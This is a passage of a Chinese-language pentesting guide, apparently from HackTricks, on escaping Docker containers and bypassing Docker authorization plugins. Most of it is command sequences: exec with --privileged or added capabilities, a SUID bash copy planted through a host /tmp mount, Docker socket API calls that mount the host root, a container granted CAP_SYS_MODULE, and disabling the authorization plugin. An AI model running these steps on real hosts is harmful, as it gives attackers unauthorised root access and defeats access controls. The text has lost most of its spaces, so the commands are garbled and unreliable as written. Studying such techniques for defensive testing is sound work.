dockerrun-d--privilegedmodified-ubuntudocker:Errorresponsefromdaemon:authorizationdeniedbyplugincustomauth: [DOCKER FIREWALL]SpecifiedPrivilegedoptionvalueisDisallowed.See'docker run --help'.
然而,用户可以在运行的容器内创建一个 shell 并赋予它额外的权限:
dockerrun-d--security-optseccomp=unconfined--security-optapparmor=unconfinedubuntu#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de# Now you can run a shell with --privilegeddockerexec-itprivilegedbb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1debash# With --cap-add=ALLdockerexec-it---cap-add=ALLbb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4bash# With --cap-add=SYS_ADMINdockerexec-it---cap-add=SYS_ADMINbb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4bash
host> cp/bin/bash/tmp#Cerate a copy of bashhost> dockerrun-it-v/tmp:/hostubuntu:18.04bash#Mount the /tmp folder of the host and get a shelldockercontainer>chownroot:root/host/bashdockercontainer>chmodu+s/host/bashhost> /tmp/bash-p#This will give you a shell as root
请注意,您可能无法挂载文件夹 /tmp,但可以挂载其他可写文件夹。您可以使用以下命令查找可写目录:find / -writable -type d 2>/dev/null
请注意,并非 Linux 机器上的所有目录都支持 suid 位! 为了检查哪些目录支持 suid 位,请运行 mount | grep -v "nosuid"。例如,通常 /dev/shm、/run、/proc、/sys/fs/cgroup 和 /var/lib/lxcfs 不支持 suid 位。
dockerversion#First, find the API version of docker, 1.40 in this exampledockerimages#List the images available#Then, a container that mounts the root folder of the hostcurl--unix-socket/var/run/docker.sock-H"Content-Type: application/json"-d'{"Image": "ubuntu", "Binds":["/:/host"]}'http:/v1.40/containers/createdockerstartf6932bc153ad#Start the created privileged containerdockerexec-itf6932bc153adchroot/hostbash#Get a shell inside of it#You can access the host filesystem
dockerversioncurl--unix-socket/var/run/docker.sock-H"Content-Type: application/json"-d'{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}'http:/v1.40/containers/createdockerstartc52a77629a9112450f3dedd1ad94ded17db61244c4249bdfbd6bb3d581f470fadockerpsdockerexec-itc52a77629a91bashcapsh--print#You can abuse the SYS_MODULE capability
dockerpluginlist#Enumerate plugins# If you don’t have access to enumerate the plugins you can see the name of the plugin in the error output:docker:Errorresponsefromdaemon:authorizationdeniedbypluginauthobot:latest:useofPrivilegedcontainersisnotallowed.# "authbolt" is the name of the previous plugindockerplugindisableauthobotdockerrun--rm-it--privileged-v/:/hostubuntubashdockerpluginenableauthobot